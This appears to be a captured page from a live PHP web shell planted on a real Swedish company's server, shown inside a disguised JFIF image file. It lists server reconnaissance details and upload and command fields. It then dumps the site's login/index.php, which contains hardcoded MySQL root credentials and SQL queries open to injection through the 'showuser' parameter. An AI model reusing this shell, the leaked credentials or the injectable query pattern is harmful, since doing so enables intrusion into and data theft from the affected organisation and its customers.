????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.61
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/evacuationplans.astacus.se/login/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/evacuationplans.astacus.se/login/index.php
<?php 

session_start();

if( (($_SESSION['EP_SSO_INFO'])=='' )){
			header('location: http://www.evacuationplans.se/loggain.php');
	}

	$link = mysql_connect ("localhost", "root", "root123");
					mysql_select_db ("vpa");

 $clientProjectManagerEmail = $_SESSION['EP_SSO_INFO'][3];

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>EVACUATION PLANS</title>
<script type="text/javascript">
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
	
	
		function updateShowUser(selObj){
			
			var username = selObj.options[selObj.selectedIndex].value;
			if(username == "all"){
				location.href =  "index.php?showuser=all";
			}else{
				location.href =  "index.php?showuser="+username;
			}
		}
		
		
			
</script>
<style type="text/css">
.Text18Black {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 18px;
	font-style: normal;
}

	
	.Text10Black {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 10px;
	font-style: normal;
}
	
.button {
  background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
}
	
	.button:hover { 
  background-color: #53be58;
}

.Text14Gray {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 14px;
	font-style: normal;
	color: #929292;
	text-align: left;
}

#astacus_menu {
	position:fixed;
	left:0px;
	top:0px;
	width: 100%;
	height:45px;
	z-index:100;
}
#astacus_menu table tr td {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 12px;
}
#apDiv1 {
	position:absolute;
	left:1064px;
	top:795px;
	width:124px;
	height:132px;
	z-index:1;
}
</style>
<link REL="SHORTCUT ICON" HREF="../favicon.ico">
</head>

<body onload="MM_preloadImages('../images/meny1b.jpg','../images/mwny3b.jpg','../images/meny4b.jpg','../images/astacus-power1.jpg')" topmargin="0" marginheight="0">

<div id="astacus_menu">
<table width="100%" height="45" border="0" cellspacing="0" cellpadding="0" background="http://www.astacus.se/top_banner/background.png">
  <tr  >
   <td><table width="970" height="23" border="0" align="center" cellpadding="0" cellspacing="0">
     <tr>
       <td width="133"  ><a href="http://www.astacus.se/index.php?page=start&amp;from=notes"><img src="http://www.astacus.se/top_banner/logga.png" width="99" height="21" border="0"></a><span style="color:#ffffff"><a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a></span></td>
       <td width="717" valign="bottom"  ><table width="595" height="20" border="0" cellspacing="0" cellpadding="0">
         <tr>
           <td><span style="color:#ffffff; font-family: Arial, Helvetica, sans-serif;"><a href="http://www.astacus.se/index.php?page=nyheter&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">News</a> <a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a>|<a href="#" style="text-decoration:none; color:#000">&nbsp;</a> <a href="http://www.astacus.se/index.php?page=start&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">Business areas</a> <a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a>|<a href="#" style="text-decoration:none; color:#000">&nbsp;</a> <a href="http://www.astacus.se/index.php?page=referenser&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">Customers</a> <a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a>|<a href="#" style="text-decoration:none; color:#000">&nbsp;</a> <a href="http://www.astacus.se/index.php?page=astacus&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">About Astacus</a> <a href="#" style="text-decoration:none; color:#ffffff">&nbsp;</a>|<a href="#" style="text-decoration:none; color:#000">&nbsp;</a><a href="http://www.astacus.se/index.php?page=kontakt&amp;from=notes" target="_blank" style="text-decoration:none; color:#ffffff">Contact us </a></span></td>
         </tr>
       </table></td>
     </tr>
     <tr>
       <td height="5" colspan="2" ></td>
     </tr>
   </table></td>
  </tr>
</table>
</div>
<br />
<br>
<table width="1100" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="32" rowspan="2" valign="top"><img src="../images/skugga_left.jpg" width="32" height="572" /></td>
    <td width="1135" height="89" valign="top"><table width="985" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td width="754"><br />
          <a href="index.php"><img src="../images/supervision_loggo.png" alt="" width="308" height="74" hspace="0" vspace="0" border="0" /></a></td>
        <td width="232" align="right" valign="bottom">
            
            <?php
            
            $sql = "SELECT SystemUser.Username as Username FROM ICADADMINUSERS, SystemUser WHERE ICADADMINUSERS.SystemUSerId = SystemUser.SystemUserId and ICADADMINUSERS.SystemUserId = '".$_SESSION['EP_SSO_INFO'][0]."'";
		
			$admin = false;
			$result = mysql_query($sql);
	  		while ($row = mysql_fetch_assoc($result)){ 
				
			    $admin = true;
                $admin_username = $row['Username'];
                echo(' <span class="Text18Black">LOGGED IN AS: ADMIN </span>');
			}
				
            
            ?>
            
            
             </td>
      </tr>
      <tr>
        <td colspan="2"><a href="index.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image1','','../images/meny1b.jpg',1)"><img src="../images/meny1a.jpg" name="Image1" width="121" height="36" border="0" id="Image1" /></a><img src="../images/meny_l.jpg" alt="" width="1" height="36" /><img src="../images/meny_l.jpg" width="1" height="36" /><img src="../images/meny_pass.jpg" width="749" height="36" /><img src="../images/meny_l.jpg" width="1" height="36" /><a href="../loggain.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image4','','../images/meny4bb.jpg',1)"><img src="../images/meny4aa.jpg" name="Image4" width="111" height="36" border="0" id="Image4" /></a></td>
      </tr>
    </table></td>
    <td width="33" rowspan="2" valign="top"><img src="../images/skugga_right.jpg" width="32" height="572" /></td>
  </tr>
  <tr>
    <td valign="top"><table width="985" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td align="center" class="Text16Gray"><br />
          <table width="90%" border="0" cellspacing="0" cellpadding="0">
            <tbody>
              <tr class="Text18Black">
                <td width="29%">Show projects for:<br />
                  <select name="username" class="Text18Black" id="username" onchange="updateShowUser(this);">
                    <option value="all" >All Users</option>
                    
                    <?php
					  if($_GET['showuser'] != ""){
					       $clientProjectManagerEmail = $_GET['showuser'];
						  }
					  
					  $sql = "SELECT * FROM SystemUser WHERE CompanyId = '".$_SESSION['EP_SSO_INFO'][1]."' and SystemUserstatusId = 1 Order by Username asc";
		
					$x = 0;
					$result = mysql_query($sql);
	  				while ($row = mysql_fetch_assoc($result)){ 
					  ?>
                    <option value="<?php echo($row['Username']);?>" <?php if($row['Username'] == $clientProjectManagerEmail){echo("selected");} ?> ><?php echo($row['Username']);?></option>
                    
                    <?php }?>
       
                  </select></td>
                <td width="45%" align="right">&nbsp;</td>
                <td width="26%" align="right"><input type="button" name="button" id="button" value="Create new order" class="button" onClick="window.location.href = 'newproject.php'" /></td>
              </tr>
            </tbody>
          </table>
          <br />
          <table width="90%" border="0" cellspacing="0" cellpadding="0">
            <tbody>
              <tr class="Text18Black">
                <td width="14%">Order ID</td>
                <td width="71%">Project name</td>
                <td width="15%" align="right">Order date</td>
              </tr>
            </tbody>
        </table>
             <form id="form2" name="form2" method="post" action="moveprojects.php">
          <?php
			
			$extra = "";	
			
			if($clientProjectManagerEmail != "" and $_GET['showuser'] != "all"){
				$extra .= "and clientProjectManagerEmail = '$clientProjectManagerEmail'";	
			}
                 
        
                 if($_GET['show'] == "archive"){   
			         $sql = "SELECT * FROM Project WHERE CompanyId = '".$_SESSION['EP_SSO_INFO'][1]."' and Name LIKE 'EP_%' $extra and ProjectStatusId = 10 Order by ProjectID desc";
                     
                 }else {
                    $sql = "SELECT * FROM Project WHERE CompanyId = '".$_SESSION['EP_SSO_INFO'][1]."' and Name LIKE 'EP_%' $extra and ProjectStatusId != 10 Order by ProjectID desc";
                 }
		
		
			$x = 0;
			$result = mysql_query($sql);
	  		while ($row = mysql_fetch_assoc($result)){ 
				
			if($x % 2 === 0){
				$color = "#FFFFFF";
			}else{
				$color = "#EEEEEE";
			}
				
		   $ProjectStatusId = $row['ProjectStatusId'];
				
				if($ProjectStatusId == 12){
					$color = "#ff0000"; //RFMI
					
				}else if($ProjectStatusId == 8){
					$color = "#00f006"; //DELIVERED
				}else if($ProjectStatusId == 14){
					$color = "#ed00f0"; // PARTDELIVERED
				}else if($ProjectStatusId == 1){
					$color = "#ff0000"; // HALTED
				}else if($ProjectStatusId == 6){
					//$color = "#c5ffc2"; // IN PRODUCTION
				}
				
			?>
            
          
          
          <table width="90%" height="40" border="0" cellpadding="0" cellspacing="0" bgcolor="<?php echo($color);?>">
            <tbody>
              <tr class="Text18Black">
                <td width="14%">
                  
                  <?php if($admin == "true"){?>  
                    <input type="checkbox" name="checkbox[]" value="  <?php echo($row['ProjectId']);?>"/>
                       <?php }?>
                    
                    <?php echo($row['ProjectId']);?>
                  
                  </td>
				  <td width="44%"><a href="project.php?projectid=<?php echo($row['ProjectId']);?>" style="display:block;"><?php echo($row['Name']);?></a></td>
                <td width="42%" align="right"><?php echo(substr($row['createDate'],0,10));?></td>
              </tr>
            </tbody>
          </table>
          <?php $x++;}?>
           
          <br />
          <?php if($admin == "true"){?>
          <table width="90%" border="0" cellspacing="0" cellpadding="0">
            <tbody>
              <tr class="Text18Black">
                <td width="29%"><input type="submit" name="button2" id="button2" value="Move projects to user:" />                  <br /></td>
                <td width="45%" align="left"><select name="move_to_user" class="Text18Black" id="move_to_user">
              
                  <?php
					 
					  $clientProjectManagerEmail = $admin_username;
					
					  
					  $sql = "SELECT * FROM SystemUser WHERE CompanyId = '".$_SESSION['EP_SSO_INFO'][1]."' and SystemUserstatusId = 1 Order by Username asc";
		
					$x = 0;
					$result = mysql_query($sql);
	  				while ($row = mysql_fetch_assoc($result)){ 
					  ?>
                  <option value="<?php echo($row['Username']);?>" <?php if($row['Username'] == $clientProjectManagerEmail){echo("selected");} ?> ><?php echo($row['Username']);?></option>
                  <?php }?>
                </select></td>
                <td width="26%" align="right">&nbsp;</td>
              </tr>
            </tbody>
          </table>
          <br />
          <?php }?>
                  <br />
            </form>
            <table width="90%" border="0" cellspacing="0" cellpadding="0">
               <tbody>
                 <tr class="Text18Black">
                     <?php
                       if($_GET['show'] == "archive"){ 
                     ?>
                   <td width="29%"><input type="button" name="button3" id="button3" value="Show ongoing projects" class="button" onclick="window.location.href = 'index.php'" />    
                       <?php }else{ ?>
                         <td width="29%"><input type="button" name="button3" id="button3" value="Show archived projects" class="button" onclick="window.location.href = 'index.php?show=archive'" />    
                       
                       <?php }?></td>
                   <td width="45%" align="left">&nbsp;</td>
                   <td width="26%" align="right">&nbsp;</td>
                 </tr>
               </tbody>
            </table>
            <br />

<table width="90%" border="0" cellspacing="0" cellpadding="0">
            <tbody>
              <tr class="Text18Black">
                <td width="57%"><table width="547" border="0" cellspacing="0" cellpadding="0">
                  <tr class="text">
                    <td width="18" bgcolor="#FF0000">&nbsp;</td>
                    <td width="229">&nbsp;&nbsp;Request for more info</td>
                    <td width="17" bgcolor="">&nbsp;</td>
                    <td width="283">&nbsp;&nbsp;</td>
                  </tr>
                  <tr class="text">
                    <td width="18">&nbsp;</td>
                    <td width="229">&nbsp;</td>
                    <td width="17">&nbsp;</td>
                    <td>&nbsp;</td>
                  </tr>
                  <tr class="text">
                    <td width="18" bgcolor="#07FA00">&nbsp;</td>
                    <td width="229">&nbsp;&nbsp;Completed</td>
                    <td width="17" bgcolor="">&nbsp;</td>
                    <td>&nbsp;&nbsp;Customer ID: <?php echo($_SESSION['EP_SSO_INFO'][1] );?></td>
                  </tr>
                </table></td>
                <td width="28%">&nbsp;</td>
                <td width="15%" align="right">&nbsp;</td>
              </tr>
            </tbody>
          </table>
<br />
<br />
<table width="90%" border="1" cellspacing="0" cellpadding="0">
  <tbody>
    <tr>
      <th align="left" scope="col"><table width="520" cellspacing="0" cellpadding="0" border="0" style="font-family: 'Gill Sans', 'Gill Sans MT', 'Myriad Pro', 'DejaVu Sans Condensed', Helvetica, Arial, 'sans-serif'">
        <tbody>
          <tr height="21">
            <td height="21" colspan="3" style="font-size: 10px" data-olk-copy-source="MessageBody">Please note, there might be delays on or after the following dates due to holidays:</td>
          </tr>
          <tr height="21">
            <td width="260" height="21" style="font-size: 10px"><div>
              <div>NEW YEAR&rsquo;S DAY</div>
            </div></td>
            <td width="151" align="left" style="font-size: 10px">01-jan-25</td>
            <td width="109" style="font-size: 10px"><div>Monday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>BHOGI</div></td>
            <td align="left" style="font-size: 10px">13-jan-25</td>
            <td style="font-size: 10px"><div>Monday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>SANKRANTI</div></td>
            <td align="left" style="font-size: 10px">14-jan-25</td>
            <td style="font-size: 10px"><div>Tuesday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>KANUMU</div></td>
            <td align="left" style="font-size: 10px">15-jan-25</td>
            <td style="font-size: 10px"><div>Wednesday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>MAHASIVARATRI</div></td>
            <td align="left" style="font-size: 10px">26-feb-25</td>
            <td style="font-size: 10px"><div>Wednesday</div></td>
          </tr>
              <tr height="21">
            <td height="21" style="font-size: 10px"><div>UGADI</div></td>
            <td align="left" style="font-size: 10px">31-mar-25</td>
            <td style="font-size: 10px"><div>Monday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>Independence Day</div></td>
            <td align="left" style="font-size: 10px">15-aug-25</td>
            <td style="font-size: 10px"><div>Friday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>VINAYAKA CHAVITHI</div></td>
            <td align="left" style="font-size: 10px">27-aug-25</td>
            <td style="font-size: 10px"><div>Wednesday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>GANDHI JAYANTHI</div></td>
            <td align="left" style="font-size: 10px">02-okt-25</td>
            <td style="font-size: 10px"><div>Thursday</div></td>
          </tr>
            
            
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>Dussera</div></td>
            <td align="left" style="font-size: 10px">03-okt-25</td>
            <td style="font-size: 10px"><div>Friday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>DEEPAVALI</div></td>
            <td align="left" style="font-size: 10px">20-okt-25</td>
            <td style="font-size: 10px"><div>Monday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>Nagual Chavithi</div></td>
            <td align="left" style="font-size: 10px">24-okt-25</td>
            <td style="font-size: 10px"><div>Friday</div></td>
          </tr>
          <tr height="21">
            <td height="21" style="font-size: 10px"><div>CHRISTMAS</div></td>
            <td align="left" style="font-size: 10px">25-dec-25</td>
            <td style="font-size: 10px"><div>Thursday</div></td>
          </tr>
        </tbody>
      </table></th>
    </tr>
  </tbody>
</table>
<br />
<br />
<br />
          <img src="../images/h_line.jpg" width="984" height="23" /></td>
      </tr>
    </table>
      <br />
      <table width="985" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td valign="middle" class="Text10Black"><center>
            &copy; Astacus  AB | Strandv&auml;gen 3, 591 36 Motala, Sweden | 0141 - 540 40 | <a href="mailto:info@astacus.se">info@astacus.se</a>
          </center></td>
        </tr>
      </table></td>
  </tr>
</table>
<p>&nbsp;</p>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit